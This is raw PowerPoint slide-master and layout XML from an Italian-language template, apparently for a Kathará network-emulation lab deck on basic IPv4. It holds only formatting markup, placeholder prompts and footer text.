            <a:ext cx="10363200" cy="866775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2996952"/>
            <a:ext cx="8534400" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del sottotitolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A black background with a black square&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B150B1F-FA08-F63A-3429-F7F8A760DB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0788" y="150788"/>
            <a:ext cx="4234565" cy="945842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284745756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 dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto testo verticale 2"/>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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5486F16B-0B58-45B6-9061-CA60B6CB76B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D754CCF-D619-4891-8E0C-E8A44AB624BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42347520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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" orient="vert"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839200" y="274641"/>
            <a:ext cx="2743200" cy="5851525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto testo verticale 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="274641"/>
            <a:ext cx="8042031" cy="5851525"/>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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06ABEC1F-57AF-4AF1-B41E-3F8C58106046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC44205-C96E-4D3D-B0E4-CEBDE5B2D649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30916927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Copyright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359400-AFF6-4FC9-8E2F-F363C6F6602C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" err="1"/>
              <a:t>notice</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC95E1F6-EE88-4027-874C-C2A60CB4012A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684B42B5-5FDC-4B42-887A-B68A97D000BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C412A2-966A-4BF2-921A-CFBA729795EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1412876"/>
            <a:ext cx="10972800" cy="4713288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Fare clic per modificare gli stili del testo dello schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Secondo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Terzo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Quarto livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Quinto livello</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381225841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ection 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72C402-67A5-4652-B395-80C3CFCC7964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2286000"/>
            <a:ext cx="10972800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662A33B8-9C12-4DD4-B7A2-462DBDF9FD58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D054AC4-794D-4989-9E00-3CA5380BB33B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE93C49-2746-445A-8FEE-BFD8EDF009A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="3645024"/>
            <a:ext cx="8534400" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del sottotitolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6142620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 dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B5F34A-3762-4DC4-8521-3CCFBDBBB557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD2D072-E423-4081-B786-4B5AABE6E907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18373073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 dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1412875"/>
            <a:ext cx="5392615" cy="4713291"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189786" y="1412875"/>
            <a:ext cx="5392615" cy="4713291"/>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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D3FD9D-035D-4317-87B9-2E07DC513C53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0056CC62-4927-46CE-8071-12D4280A824B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30502605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 dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E61840-3800-42E1-8104-908EC2290A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBDBC235-FCC8-44F7-AF2D-D19BB003DF74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22121212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8210B621-DDDB-4969-8052-9E481273EFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF427022-EF7C-4DDD-9245-E8A971AB8D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4851648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609601" y="273050"/>
            <a:ext cx="4011247" cy="1162050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767386" y="273053"/>
            <a:ext cx="6815015"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="1435103"/>
            <a:ext cx="4011247" cy="4691063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457212" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
